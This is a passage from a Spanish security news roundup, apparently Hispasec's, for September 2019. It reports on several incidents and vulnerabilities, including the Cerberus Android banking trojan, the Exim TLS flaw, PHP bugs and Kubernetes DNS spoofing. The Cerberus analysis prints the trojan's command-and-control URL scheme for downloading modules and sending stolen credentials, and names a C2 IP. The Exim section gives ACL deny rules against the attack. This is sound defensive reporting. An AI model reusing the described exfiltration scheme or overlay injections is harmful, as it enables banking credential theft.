Category: Noticias

Noticias de Seguridad Setiembre 2019

¿Podemos hablar de hackeo en el caso de la cuenta de WhatsApp de Albert Rivera?

El pasado viernes 20 de septiembre el político Albert Rivera denunciaba ante la Guardia Civil que su cuenta de Twitter había sido hackeada.

El ‘modus operandi’ se basó en técnicas de ingeniería social que consiguieron engañar al líder de la formación naranja para entregar un código enviado por WhatsApp a los atacantes. Estos, previamente, habían forzado el envío de este código denunciando, a través de la propia aplicación, que la cuenta había sido robada.

Al día siguiente una cuenta de Twitter denominada @anonktalonia, revelaba posibles grupos de whatsapp pertenecientes al líder del partido Ciudadanos. Aunque no se atribuía directamente la autoría, la revelación de esta información nos hace entrever que ellos podrían ser quienes estaban detrás del hackeo. Aunque todo esto les duró bien poco, ya que en la tarde del domingo 22 les fue cerrada la cuenta.

Cabe destacar que para llevar a cabo este ataque de ingeniería social, los atacantes solo necesitaron dos cosas: a saber, el número de móvil de Albert Rivera y la participación del propio político en una trampa que tuvo más que ver con las vulnerabilidades propias de la psicología humana, que con conocimientos técnicos especializados en seguridad informática.

La ingeniería social es una rama de la seguridad informática que tiene como objeto de estudio las vulnerabilidades asociadas a la infraestructura humana. Fundamentalmente, la ingeniería social entiende a la persona como un sistema más que puede ser vulnerado si se descubren sus fallos conduciendo a un recursos informático que es el objetivo del ataque. Típicamente, las acciones con éxito en ingeniería social desencadenan en la víctima o bien una liberación de información o bien la realización de una acción y tienen lugar tras explotar un fallo en la manera en que los seres humanos percibimos o gestionamos la información o las emociones. La ingeniería social ha sido siempre en seguridad informática un vector más de entrada a un posible sistema. Siempre se ha estudiado como un técnica válida y, de hecho, se pone en práctica en pruebas de penetración en sistemas controladas por todas las empresas de seguridad que desempeñan estos trabajos. Del mismo modo que una contraseña débil facilita el acceso a un sistema, un individuo no familiarizado con la seguridad, es un excelente vector de entrada a un sistema.

La ingeniería social basa su éxito en la debilidad del usuario, siendo piedra de toque la premisa que considera al humano como el eslabón más débil de la cadena que hace posible que se pueda comprometer todo un sistema. Por este motivo, dejar de auditar la llamada «infraestructura humana», esto es, el modo en el que las personas reaccionan a las trampas o estímulos por parte de un atacante, supone un completo riesgo para las empresas. Las tecnologías evolucionan a diario, no así la psicología humana, que lleva acompañándonos y establecida de forma inalterada, con sus virtudes y carencias, desde que nos constituimos como especie. Siendo esto así, es lógico concluir que para acceder a un sistema informático es más fácil atacar la tradicional psicología humana que un sistema actualizado y fuertemente securizado como un algoritmo de cifrado. He ahí la legitimidad de la Ingeniería Social como una rama más de la seguridad.

Todo esto viene a colación de haber leído en algunos medios, digamos tecnológicos, que no se puede hablar de hackeo puesto que el ataque ha tenido éxito gracias a técnicas de phishing. Si bien sería erróneo hablar de hackeo a Twitter, en tanto que ni su infraestructura humana ni su infraestructura tecnológica han sido objetivos de ataque, sí es técnicamente correcto, tal y como cita la prensa, hablar de un hackeo a la cuenta de Twitter de Albert Rivera. El objetivo del ataque era comprometer un recurso informático: su cuenta. Los vectores empleados incluían tanto factores técnicos -enlaces, comunicación digital – como factores psicológicos.

Otro asunto sería aclarar si el ataque en cuestión ha sido un phishing o no. Para mí y después de aclarar dudas leyendo la definición de Wikipedia, no cabría duda:

Phishing, conocido como suplantación de identidad, es un término informático que denomina un modelo de abuso informático y que se comete mediante el uso de un tipo de ingeniería social, caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una contraseña, información detallada sobre tarjetas de crédito u otra información bancaria). El cibercriminal, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea o incluso utilizando también llamadas telefónicas.

Se trata de un phishing, bastante artesanal, pero un phishing al fin y al cabo, por lo que la mayoría de los titulares que he venido observando por la prensa en estos días no pueden ser tildados de incorrectos desde una perspectiva técnica. La cuenta de Albert Rivera ha sido hackeada, phishing mediante y, por tanto, aprovechando técnicas de ingeniería social que dejan en evidencia la falta de securización de la psicología humana con respecto a los avances tecnológicos.

Microsoft libera parches de emergencia para Internet Explorer y Defender

Microsoft parchea dos vulnerabilidades, una de ellas es un 0-day en Internet Explorer que está siendo explotado activamente en estos momentos.

La primera vulnerabilidad, descubierta por el investigador Clément Lecigne y con identificador CVE-2019-1367 consiste en una ejecución remota de código localizada en la lógica usada por el motor Microsoft Scripting Engine para manipular objetos en memoria.

Esta vulnerabilidad permitiría a un atacante hacerse con el control de la máquina víctima mediante la visita a una web especialmente diseñada usando Internet Explorer.

Además, Microsoft también ha lanzado otro parche para una denegación de servicio en Windows Defender.

Ésta última, descubierta por el investigador de F-Secure Charalampos Billinis y Wenxu Wu de la firma Security Labs, tiene asignado el identificador CVE-2019-1255.

Según Microsoft, esta vulnerabilidad puede ser aprovechada por un atacante para impedir a un usuario ejecutar binarios. Aunque para aprovechar esta falla, es necesario primero adquirir permisos de ejecución en la máquina.

La primera falla afecta a las versiones 9, 10 y 11 del navegador mientras que la vulnerabilidad en Microsoft Defender afecta a las versiones anteriores a 1.1.16400.1. Como es habitual, se recomienda aplicar las actualizaciones lo más pronto posible.

Más Información:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1255
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1367
https://thehackernews.com/2019/09/windows-update-zero-day.html

Cerberus llega a España y Latinoamerica

Cerberus, el reciente malware bancario para Android, afecta ahora a entidades bancarias españolas y latinoamericanas.

Imagen: ThreatFabric

Introducción

El miércoles 18 de septiembre llegó al laboratorio de Hispasec una nueva muestra del troyano bancario para Android ‘Cerberus’. Desde su lanzamiento en Junio de 2019, este malware bancario ha ido creciendo en popularidad poco a poco.

Sus desarrolladores no distribuyen las muestras para infectar a las víctimas, sino que venden el troyano el un foro ‘underground’ para que sean sus clientes los que, a través de una herramienta automatizada, construyan el APK malicioso que distribuirán a sus víctimas.

Este troyano tiene su propia cuenta de Twitter (https://twitter.com/androidcerberus), en la que sus desarrolladores publican las novedades incluidas en las nuevas versiones e incluso bromean con los analistas de malware más conocidos de la comunidad.

El hecho de que su popularidad vaya en aumento ha hecho que en la muestra detectada este miércoles se encuentren entidades bancarias españolas y latinoamericanas afectadas por primera vez. En pasadas versiones se habían descubierto entidades francesas y una japonesa.

Propagación

Tal y como suele ser habitual con este tipo de malware, es probable que la distribución del APK malicioso se haya realizado a través de páginas web fraudulentas.

Teniendo en cuenta que la aplicación maliciosa utiliza el logo de ‘Flash Player’ como icono y su nombre, probablemente se haya distribuido a través de una falsa web de videos que incita al usuario a instalar la aplicación como una falsa actualización de su reproductor.

Infección

Una vez que el usuario instala la aplicación maliciosa y la inicia por primera vez, ésta solicita al usuario que le de permisos de accesibilidad. Estos permisos permiten al malware recibir eventos generados por otras aplicaciones que se encuentren ejecutando en primer plano.

Vista con la solicitud de permisos de accesibilidad

Los permisos de accesibilidad se utilizan habitualmente para que ciertas aplicaciones proporcionen una mejor experiencia de usuario en caso de que el usuario tenga, por ejemplo, problemas de visión. De esta forma, estas aplicaciones pueden proporcionar funcionalidades de lectura del texto de la pantalla.

El motivo por el cual la aplicación maliciosa necesita este permiso es que le permite recibir eventos generados por la aplicación que se encuentra ejecutándose en primer plano, incluyendo el nombre de paquete de dicha aplicación. Con esta información, el malware es capaz de detectar cuando una aplicación es iniciada por parte del usuario, y de esta forma mostrar una ventana falsa solicitando las credenciales de acceso a la entidad bancaria.

Adicionalmente, los permisos de accesibilidad también son utilizados por este malware para protegerse y no ser desinstalado por el usuario. Los servicios de accesibilidad pueden simular eventos (toques en la pantalla, pulsación de botones, etc.), por lo que el malware detecta si el usuario está navegando por los ajustes del sistema e intentando desinstalar el troyano. En caso de que esto ocurra, la aplicación maliciosa envía eventos para salir de los ajustes y evitar su desinstalación.

Tras obtener los permisos de accesibilidad, este malware comienza la actividad maliciosa. La aplicación instalada realmente actúa a modo de ‘dropper’, ya que la funcionalidad de robo  y envío de datos se realiza a través de un módulo descargado del servidor de control. Podemos distinguir dos etapas:

  1. La aplicación ‘dropper’ desempaqueta un fichero .DEX que implementa una primera etapa encargada de comprobar el estado del dispositivo infectado, registrarlo en el servidor de control y descargar el módulo malicioso.
  2. Descarga del módulo malicioso (a través de la URL: http://[DOMINIO]/gate.php?action=getModule&data=[DATOS_DISPOSITIVO_CIFRADOS]. El módulo malicioso se trata de un fichero APK, aunque no se instala la aplicación en el dispositivo. En su lugar, el ‘dropper’ cargará dinámicamente las clases necesarias del APK. Este módulo incluye la funcionalidad necesaria para descargar y mostrar las inyecciones para cada entidad. Además incluye el resto de funciones de robo de datos que se explicarán a lo largo de este documento.

Funcionalidades para el robo de datos

Para el robo de credenciales bancarios, este troyano bancario sigue el mismo esquema de funcionamiento que el resto de troyanos bancarios, inyecciones basadas en ‘overlays’. El uso de ‘overlays’ es probablemente la técnica más efectiva, y quizá por ello la preferida por los atacantes, para el robo de credenciales bancarias en Android.

Una vez que la aplicación maliciosa contacta con el servidor para registrar el dispositivo, ésta envía la lista completa de aplicaciones instaladas. Como respuesta, el servidor de control responde con la lista de aplicaciones afectadas de entre todas las aplicaciones instaladas.

Petición al servidor de control para registrar el nuevo dispositivo
Petición al servidor de control para enviar la lista de aplicaciones instaladas

Como respuesta, la aplicación recibe una lista de aplicaciones afectadas de entre las instaladas. Una vez que la aplicación recibe esta lista de entidades afectadas, ésta se encarga de descargar una a una las inyecciones de cada aplicación afectada. Una vez descargada la inyección, se guarda para mostrarla posteriormente.

Código encargado de descargar las inyecciones

Como suele ser habitual en el malware bancario para Android, las inyecciones de Cerberus también están realizadas utilizando HTML y JavaScript. De esta forma, lo que descarga el malware no es más que un fichero HTML que mostrará posteriormente utilizando una ‘WebView’.

Para mostrar la ‘WebView‘ con la falsa web solicitando los datos de usuario, esta aplicación se instala solicitando al usuario que le dé permisos de accesibilidad. Estos permisos le permiten recibir eventos en un servicio ejecutando en segundo plano cada vez que el usuario abre un aplicación o realiza alguna acción en la aplicación.

Al recibir estos eventos, la aplicación maliciosa recibe información sobre la aplicación que se está ejecutando en primer plano. Esta funcionalidad es utilizada para determinar si la aplicación en ejecución es alguna de las afectadas. En caso de ser así, el troyano abrirá una nueva actividad con la ‘WebView’ y la web de phishing.

Inyección para la entidad afectada

Como se puede observar en la imágenes, todas las peticiones se realizan a una URL con la estructura “http://[DOMINIO]/gate.php?action=[COMANDO]&data=[DATOS CIFRADOS]”. El valor del parámetro ‘action’ para el envío de las credenciales robadas es ‘sendInjectLogs’, y en el parámetro ‘data’ se envía cifrado el identificador del paquete correspondiente a la entidad afectada y las credenciales de acceso.

Además del robo de datos bancarios, la aplicación maliciosa también incluye funcionalidad para enviar los SMS recibidos y la agenda de contactos. Para ello, guarda la lista de SMS y contactos en las preferencias compartidas de la aplicación y los envía posteriormente al servidor de control.


Código encargado de guardar los SMS para su posterior envío

Cifrado de peticiones

Como se ha comentado anteriormente, este malware implementa un algoritmo de cifrado que evita inspeccionar los datos enviados al servidor directamente. El algoritmo de cifrado utilizado se trata de RC4. La clave de cifrado es diferente para cada muestra y se almacena en las preferencias compartidas de la aplicación utilizando la clave “key”.

Resulta especialmente curioso el uso del algoritmo RC4 para el cifrado de los datos, ya que es el mismo algoritmo de cifrado utilizado por otro troyano bancario popular, ‘Anubis Bankbot’. Aunque sus desarrolladores afirman que Cerberus se ha desarrollado de cero, el uso de RC4 como algoritmo de cifrado, además del uso de PHP como lenguaje de programación en la parte del servidor y la similitud en las respuestas de algunas de las peticiones, hacen pensar que en mayor o menor medida este nuevo troyano podría estar basado en el código de Anubis Bankbot.

Entidades afectadas

Entre las entidades afectadas se encuentran las españolas Santander, BBVA, Bankia, Cajamar, Banco Sabadell, Ibercaja y Univia. Mientras que en latinoamerica afecta a entidades como Santander (Chile y Perú) y BBVA (Perú).

Conclusiones

Como hemos visto, Cerberus es uno de los troyanos bancarios para Android más recientes. Aún así, está ganando popularidad rápidamente, lo que supone que sus desarrolladores trabajen para incluir nuevas funcionalidades en su creación.

Esta nueva muestra no incluye novedades con respecto a sus funcionalidades, sin embargo, incluye un importante añadido: soporte para el robo de datos bancarios de entidades españolas. Es la primera muestra de Cerberus que se ha descubierto con inyecciones para entidades bancarias españolas.

Teniendo en cuenta la popularidad que ha ganado esta familia de malware, era un secreto a voces que pronto acabaría incorporando entidades españolas y latinoamericanas entre las afectadas. Debemos seguir alerta, ya que se espera que se incluyan nuevas entidades de todo el mundo con el paso del tiempo, además de nuevas funcionalidades.

Indicadores de compromiso

Si desea más información sobre los identificadores de compromiso y los hashes de la muestra, póngase en contacto con nuestro departamento de malware: malwaredept@hispasec.com

Phishing afecta a la web de denuncias SecureDrop

La web de denuncias SecureDrop, perteneciente a The Guardian, estaba redirigiendo a una web phishing que tenía como objetivo robar los codenamesde los usuarios. Además, esta web phishing anunciaba una aplicación móvil para Android que permitía a los atacantes realizar diversas actividades maliciosas en los dispositivos de las víctimas.

SecureDrop es un servicio para compartir datos mediante la red TOR, esto permite a los denunciantes enviar información a las empresas de periodismo de forma anónima. Por ejemplo, podemos hacer uso del servicio en la dirección legítima de la web de noticias The Guardian en 33y6fjyhs3phzfjj.onion

Cuando un usuario desea enviar información a los periodistas del medio de comunicación recibe un nombre en clave, codename, que luego se puede utilizar para futuras comunicaciones. Este nombre en clave es privado, ya que cualquiera que lo conozca puede ver las comunicaciones realizadas con los periodistas.

Una vez que los atacantes obtienen los codenames de los usuarios pueden iniciar sesión en la web legítima de SecureDrop y hacerse pasar por la fuente para robar información y comunicaciones.

Poco después de anunciar que había sido descubierto el phishing la web maliciosa fue desactivada. Sin embargo, no se sabe si el sitio fue desconectado por el equipo de seguridad de The Guardian, o por los atacantes.

Aplicación Android maliciosa

Los atacantes estaban anunciando en la web phishing una aplicación Android que permitía a los usuarios «ocultar su ubicación».

Los descubridores del phishing consiguieron descargar el malware y todavía está disponible el enlace para su descarga desde la cuenta de Twitter de Elliot Alderson

Según nos muestra el análisis del APK en VirusTotal podemos ver una larga lista de permisos que asemejan la funcionalidad a la de un RAT. Entre los permisos solicitados encontramos el monitoreo de las llamadas, ubicación, mensajes de texto, grabar audios…

Tras analizar el malware el investigador Lukas Stefanko dijo:
«La aplicación es un malware controlado de forma remota y ejecutará comandos enviados por el servidor. También puede obtener texto de notificaciones, enviar imágenes desde la galería y tomar capturas de pantalla si el dispositivo está rooteado».

Además, se cree que parte de la información robada del dispositivo puede utilizarse para realizar el secuestro de la tarjeta SIM. La aplicación envía la información a un servidor de comando y control con IP 213.188.152.96. Dicha dirección IP ha sido utilizada para distintas campañas de malware.

Más información:

https://www.bleepingcomputer.com/news/security/phishing-attack-targets-the-guardians-whistleblowing-site/

La opción «eliminar para todos» de WhatsApp no elimina los archivos enviados a iPhone.

La opción, que fue introducida hace dos años, contiene un fallo de seguridad sin parchear que no elimina los archivos enviados a dispositivos iPhone, por lo que, en cuanto a funcionalidad se refiere, sencillamente se limita a generar una sensación de privacidad que no se corresponde con la realidad.

Tanto WhatsApp, como su competidor de software – parcialmente – libre, Telegram, ofrecen la opción «Eliminar para todos» cuando se selecciona un determinado archivo enviado. Esto permite rectificar el envío y enmendar un posible – y a menudo incómodo – error cuando, típicamente, se envía por descuido material a un destinatario no deseado.

En el caso de WhatsApp, la opción sólo está disponible en un lapso de tiempo de una hora, ocho minutos y dieciséis segundos, una vez el mensaje o archivo se ha enviado. Un tiempo, seguramente, más que razonable para percatarse del error.

Sin embargo, tanto da el lapso de tiempo configurado por el fabricante, si los mensajes o archivos enviados, tal y como ha descubierto el investigadorShitesh Sachan, no se eliminan correctamente para los usuarios de iPhone. Incluso aunque recibamos de la aplicación el mensaje de «el mensaje ha sido borrado».

Si bien es cierto que la versión para Android de la popular aplicación de mensajería llega incluso a borrar los archivos de la galería del receptor cuando se selecciona la opción «borrar para todos», no ocurre así para los usuarios de iPhone, un contexto donde la aplicación parece seguir un diseño diferente. 

El problema radica fundamentalmente en que la aplicación trae activada por defecto la opción de «guardar automáticamente» en las respectivas galerías de Android o iPhone y, pese a que desactivar esta opción mitigaría parte del problema, poca gente configura correctamente su aplicación para que adopte este comportamiento. Ni siquiera cuando las mejoras en cuanto almacenamiento y control de los activos son evidentes al activar esta opción.

A comienzos de esta semana se publicaba, igualmente, un fallo de seguridad similar que afectaba a Telegram, que también adolece de una implementación deficiente en su opción «Eliminar para todos». Sin embargo, mientras que Telegram parcheó inmediatamente el fallo, WhatsApp ha declarado que no tiene intención alguna de abordar el tema, porque la funcionalidad de dicha opción es, argumentan, eliminar de la aplicación -y no del dispositivo móvil – los archivos seleccionados.

El equipo de seguridad de WhatsApp también arguye que la pretensión de que su opción «Eliminar para todos» sirva, precisamente, para eliminar por completo el archivo, colisiona con el hecho de que el receptor del mensaje puede verlo antes de que sea borrado o hacer un «pantallazo», lo que haría inútil implementar correctamente la opción. Por otro lado, también afirman que podrían estudiar cambios en la implementación en un futuro.

En este sentido, recomendamos siempre evitar el uso de software privativo que no respete la privacidad y la seguridad del usuario, y adoptar progresivamente el uso de software cuyo código haya sido liberado – software libre – por los beneficios de seguridad y privacidad que supone el tener a disposición de una comunidad activa un código fuente auditado y saneado de manera pública.

Más información:

https://www.inputzero.io/2019/09/telegram-privacy-fails-again.html
https://thehackernews.com/2019/09/whatsapp-delete-for-everyone-privacy.html

Mozilla lanza el servicio VPN ‘Firefox Private Network’ como una extensión del navegador

Mozilla ha lanzado oficialmente un nuevo servicio VPN centrado en la privacidad, llamado Firefox Private Network , como una extensión del navegador que tiene como objetivo cifrar su actividad en línea y limitar lo que los sitios web y los anunciantes saben sobre usted.

El servicio Firefox Private Network se encuentra actualmente en versión beta y solo está disponible para usuarios de escritorio en los Estados Unidos como parte del programa «Firefox Test Pilot» recientemente eliminado de Mozilla, que permite a los usuarios probar nuevas funciones experimentales antes de su lanzamiento oficial.

El programa Firefox Test Pilot fue lanzado por primera vez por la compañía hace tres años, pero se cerró en enero de este año. La compañía ahora decicidió recuperar el programa pero con algunos cambios.

«La diferencia con el programa Test Pilot recientemente relanzado es que estos productos y servicios pueden estar fuera del navegador Firefox y estarán mucho más pulidos, y solo un paso por debajo del lanzamiento público general».

Marissa Wood, vicepresidenta de producto en Mozilla

Desde la empresa aseguran que su red privada de Firefox «proporciona una ruta segura y encriptada a la web para proteger su conexión y su información personal en cualquier lugar y en cualquier lugar donde use su navegador Firefox».

El servicio VPN de red privada de Firefox también encripta y canaliza cada una de las actividades de navegación de Internet suyas a través de una colección de servidores proxy remotos, enmascarando así su ubicación y bloqueando a terceros, incluidos el gobierno y su ISP, para que no espíen su conexión.

Cloudflare, la compañía que ofrece uno de los servicios de protección CDN, DNS y DDoS más grandes y rápidos, proporciona los servidores proxy reales para la extensión Firefox Private Network.

«Cloudflare solo observa una cantidad limitada de datos sobre las solicitudes HTTP / HTTPS que se envían al proxy de Cloudflare a través de navegadores con una extensión activa de Mozilla».

Cloudflare

Como registrarse en el servicio VPN de Firefox:

Firefox Private Network actualmente solo funciona en computadoras de escritorio, pero se cree que también estará disponible para usuarios móviles, una vez que la VPN salga de la versión beta.

Aunque el servicio Firefox Private Network es actualmente gratuito, Mozilla insinuó que la compañía está explorando posibles opciones de precios para el servicio en el futuro para mantenerlo en forma sostenible.

Por ahora, si tiene una cuenta de Firefox y reside en los Estados Unidos, puede probar el servicio VPN de Firefox de forma gratuita registrándose en el sitio web de la red privada de Firefox.

Más información:

Mozilla launches a VPN, brings back the Firefox Test Pilot program
https://techcrunch.com/2019/09/10/mozilla-launches-a-vpn-brings-back-the-firefox-test-pilot-program/

Malware utiliza el servicio BITS de Windows para robar datos

Investigadores de ciberseguridad han descubierto un nuevo malware asociado al grupo Stealth Falcon, éste malware utiliza el servicio background intelligent transfer service (BITS) para el envío de datos en segundo plano al servidor controlado por el atacante.

El grupo Stealth Falcon, patrocinado por el estado, es conocido por atacar a periodistas, activistas y personas detractoras del sistema con spyware. Este grupo centra su actividad principalmente en el Medio Oriente, más concretamente en los Emiratos Árabes Unidos (EAU).

Win32/StealthFalcon se comunica y envía los datos recopilados a los servidores de comando y control (C&C) a través del servicio de transferencia inteligente en segundo plano de Windows (BITS).

BITS es un componente de Windows que aprovecha el ancho de banda no utilizado para la transferencia, en primer o segundo plano, de archivos. Esta utilidad es muy utilizada por actualizadores de software en Windows 10 y permite reanudar la transferencia de los archivos en caso de interrupciones. Además, al ser un sistema integrado en Windows es más sencillo que un Firewall no lo bloquee, lo que ha hecho que, durante 4 años, nadie se percatase de este malware.

Según investigadores de ESET, dado que la velocidad de envío de los archivos se ajusta automáticamente y que escapa de las medidas de seguridad habitualmente configuradas, este malware puede operar en segundo plano sin ser detectado y sin modificar la experiencia de uso del usuario.

Pero la puerta trasera Win32/StealthFalcon no solo realiza la transferencia de archivos en segundo plano, primero crea una copia cifrada de los archivos y la carga en el servidor C&C a través de BITS.

Una vez cargados los archivos, el malware elimina todos los archivos de registro y los sobrescribe con datos aleatorios para dificultar el análisis forense y evitar la recuperación de los archivos.

Como explican en el informe, no ha sido diseñado solo para robar datos de los sistemas infectados, también puede ser utilizado por los atacantes para descargar herramientas maliciosas y actualizar la configuración mediante el servidor C&C.

Más información:
https://thehackernews.com/2019/09/stealthfalcon-virus-windows-bits.html

Vulnerabilidad critica en sistemas de correo electrónico Exim

Un fallo de seguridad crítico en Exim que podría permitir la ejecución de código remoto con privilegios de root en servidores que aceptan conexiones TLS.

e2212-exim_logo

Exim (EXperimental Internet Mailer) es un agente de transporte de correo electrónico o MTA utilizado por más de la mitad de los servidores de email en Internet. Es software libre que se distribuye bajo la licencia GNU GPL, y se distribuye como el MTA por defecto en muchas distribuciones GNU/Linux, como por ejemplo Debian.

A finales del pasado mes de julio el investigador Zerons descubrió un fallo de seguridad en Exim que ha recibido el identificador CVE-2019-15846 y se ha hecho público el 6 de septiembre. Esta vulnerabilidad permitiría a un atacante no autenticado ejecutar programas con privilegios de root en aquellos servidores que aceptan conexiones TLS. Para explotar la vulnerabilidad en las configuraciones por defecto se estaría utilizando una solicitud SNI especialmente manipulada, mientras que en otras configuraciones se podría realizar mediante un certificado de cliente falsificado.

SNI es un componente de protocolo TLS diseñado para permitir que los servidores presenten diferentes certificados TLS para validar y asegurar la conexión a sitios web detrás de la misma dirección IP. El error consistiría en undesbordamiento de búfer provocado por una solicitud SNI que termina en una secuencia de barra invertida durante el proceso de negociación de la conexión segura TLS (handshake).

A pesar de que el archivo de configuración predeterminado proporcionado por el equipo de desarrollo de Exim no tiene habilitado TLS, muchas distribuciones GNU/Linux se distribuyen con la configuración modificada para activar dicha opción.

Esto podría implicar que el universo de servidores Exim vulnerables sea bastante extenso. A saber, según una encuesta realizada por E-Soft Inc. y publicada a principios de septiembre, se ha estimado que el número total de servidores de correo electrónico en Internet que ejecutan Exim es de más de 500.000, correspondiendo a más de 57% de todos los servidores de correo electrónico (MX) en línea. Sin embargo, una búsqueda de instancias de Exim en Shodan muestra alrededor de 5,25 millones de resultados, con mas de 3,5 millones instancias en ejecución usando Exim 4.92. Cabe destacar que se encuentran afectadas las versiones de Exim comprendidas entre la 4.80 y la 4.92.1, ambas incluidas.

Además, el equipo de investigación de Qualys, que ha analizado el fallo afirma tener una prueba de concepto (PoC) funcional y que podrían existir otros métodos de explotación adicionales.

Aunque se ha propuesto el deshabilitar TLS como una forma de mitigación para servidores no actualizados, los desarrolladores del software no la recomiendan. Otra forma de mitigación es agregar las siguientes reglas como parte de la ACL de correo que verifican la existencia de un peer DN o SNI que finaliza con una barra invertida y, en caso de hallarlo, la conexión se rechazaría para bloquear el vector de ataque actualmente conocido:

deny condition = ${if eq{\\}{${substr{-1}{1}{$tls_in_sni}}}}
deny condition = ${if eq{\\}{${substr{-1}{1}{$tls_in_peerdn}}}}

Sin embargo, las anteriores opciones podrían afectar a usos legítimos por lo que la única opción que realmente se debería contemplar, según palabras de Heiko Schlittermann -uno de los desarrolladores-, es actualizar a la versión 4.92.2 de Exim que solventa el fallo de seguridad.

Más información:
Critical Exim TLS Flaw Lets Attackers Remotely Execute Commands as Root
https://www.bleepingcomputer.com/news/security/critical-exim-tls-flaw-lets-attackers-remotely-execute-commands-as-root/

CVE-2019-15846: Exim – local or remote attacker can execute programs
https://www.openwall.com/lists/oss-security/2019/09/04/1

Exim servers
https://www.shodan.io/report/vRKzLpdS

Múltiples vulnerabilidades en PHP permiten ejecutar código remoto

La última actualización publicada de PHP revela múltiples fallos que han sido parcheados, tanto en el core como en diferentes librerías del lenguaje. La vulnerabilidad más severa permitiría ejecutar código remoto en el servidor de la víctima.

PHP es un lenguaje diseñado originalmente para ser utilizado en aplicaciones basadas en Web junto con HTML. En la actualidad aproximadamente el 78% de los portales web están escritos en PHP, según las estadísticas dew3techs

Los sistemas afectados a estas vulnerabilidades son los siguientes: 
– Versiones PHP 7.1 y anteriores a 7.1.32.
– Versiones PHP 7.2 y anteriores a 7.2.22.
– Versiones PHP 7.3 y anteriores a 7.3.9. 

Detalles técnicos de los errores según la actualización publicada por php.net:

BugRamas afectadas
#78363 Buffer overflow in zendparse 7.3 y 7.2 
#78379 Cast to object confuses GC, causes crash 7.3 y 7.2 
#78412 Generator incorrectly reports non-releasable $this as GC child 7.3 
#77946 Bad cURL resources returned by curl_multi_info_read() 7.3 y 7.2 
#78333 Exif crash (bus error) 7.3 y 7.2 
#77185 Use-after-free in FPM master event handling 7.3 
#78342 Bus error in configure test for iconv //IGNORE 7.3 y 7.2 
#78380 Oniguruma 6.9.3 fixes CVEs 7.3 
#78179 MariaDB server version incorrectly detected 7.3 y 7.2 
#78213 Empty row pocket 7.3 
#77191 Assertion failure in dce_live_ranges() 7.3 y 7.2 
#69100 Bus error from stream_copy_to_stream (file -> SSL stream) 7.3 y 7.2 
#78282 atime and mtime mismatch 7.3 y 7.2 
#78326 improper memory deallocation on stream_get_contents() 7.3 y 7.2 
#78346 strip_tags no longer handling nested php tags 7.3 
#75457 heap use-after-free in pcrelib 7.1

Entre los bugs parcheados se encuentra Oniguruma, una popular librería de expresiones regulares que se utiliza internamente en PHP (y en muchos otros lenguajes), que ha sido actualizada a la versión 6.9.3, debido a una vulnerabilidad de ejecución de código ‘user-after-free‘ asignada con el CVE CVE-2019-13224.

Este fallo podría permitir la ejecución de código en la aplicación afectada. En caso de fallar al ejecutar el exploit podría resultar en una denegación de servicio (DoS).

Como se puede observar, los fallos afectan a librerías y funciones ampliamente utilizadas como la función Exif, la extensión CurlOpcache FastCGI Proccess Manager (FPM) entre otros.

Por el momento no hay constancia de que estos fallos estén siendo aprovechados y explotados en aplicaciones o sistemas en producción en la red. Sin embargo es altamente recomendable que tanto usuarios como proveedores de hostings actualicen sus servidores a las últimas versiones publicadas 7.3.97.2.22, o 7.1.32.


Más información:

php.net
https://www.php.net/ChangeLog-7.php

Cisecurity
https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-php-could-allow-for-arbitrary-code-execution_2019-087/


The Hacker News
https://thehackernews.com/2019/09/php-programming-language.html

DNS spoofing en Kubernetes

Los permisos por defecto en los clusters de Kubernetes permiten realizar ARP spoofing, que entre otros riesgos deja tomar el control del DNS

Tal y como ha demostrado el analista de seguridad Daniel Sagi, el diseño de red de Kubernetes junto con los permisos por defecto permite a cualquier pod realizar DNS spoofing al resto de pods del cluster. Este tipo de ataques suplantan el servidor DNS para que las máquinas en vez de resolver al dominio deseado realicen la conexión a un servicio controlado por el atacante.

Para su funcionamiento, se aprovecha que Kubernetes concede por defecto el permiso ‘NET_RAW’ (el cual puede comprobarse con el comando ‘pscap -a’) con el que pueden enviarse paquetes ARP y DNS en bruto. Conceder el permiso para paquetes ARP sin restricciones permite realizar ataques ‘SPF Spoofing’, un tipo de ataque con el que engañar el resto de pods para hacerles creer que la IP del atacante es la del DNS del cluster.

El analista que ha alertado de esta vulnerabilidad ha subido a Github una Prueba de Concepto (PoC) para poder comprobar si somos vulnerables, además de un vídeo demostrando la explotación. Un posible ejemplo de explotación sería tomar el control del DNS para suplantar a un servicio web del cluster y recibir las peticiones del resto de pods.

Código a emplear para deshabilitar el permiso. Fuente: Aquasec.

Para mitigar esta vulnerabilidad puede deshabilitarse el permiso de ‘NET_RAW’ en los pods, el cual está permitido por defecto. Para ello puede usarse el código de la imagen superior. Este permiso, el cual resulta muy peligroso debería encontrarse bloqueado por defecto en Kubernetes para evitar posibles riesgos de seguridad.

Más información:
DNS Spoofing on Kubernetes Clusters:
https://blog.aquasec.com/dns-spoofing-kubernetes-clusters

iPhone Zero Days: un nuevo spyware de altas capacidades puede monitorizar toda la vida digital de las personas

14 vulnerabilidades en iPhone han sido el objetivo de cinco cadenas de exploits (herramientas que unifican vulnerabilidades de seguridad, permitiendo al atacante penetrar en cada capa de las protecciones digitales de iOS). Estas cadenas forman parte de un ataque que ha durado años; dos de estas vulnerabilidades se trataban de Zero Days.

iPhone
Fuente de la imagen: Pexels

Los sitios web infectados que fueron utilizados como medio para llevar a cabo el ataque contenían el spyware encargado de robar información de iMessages, fotos y localización GPS en tiempo real, según lo reportado por Ian Beer y el equipo de investigación Project Zero de Google.

«No había un objetivo específico; visitar el sitio hackeado era suficiente para que el exploit se ejecutase en el dispositivo, y en caso de ejecutarse con éxito, se instalaba un módulo de monitorización», escribió Beer en un blog el pasado viernes. «Estimamos que estos sitios reciben miles de visitas cada semana». Los sitios infectados estaban activos desde hace, al menos, dos años.

Beer dijo que en el ataque se habían usado siete bugs para el navegador deiPhone (Safari), cinco para el kernel y dos «sandbox escapes« (exploit que permite acceder a funcionalidades o procesos más allá de lo permitido en una aplicación normalmente). Google ha sido capaz de hacerse con cinco exploitstotalmente distintivos y únicos para iPhone, los cuales afectan casi a cada versión de estos dispositivos que van desde iOS 10 hasta la última versión de iOS 12.

Escribía el investigador:

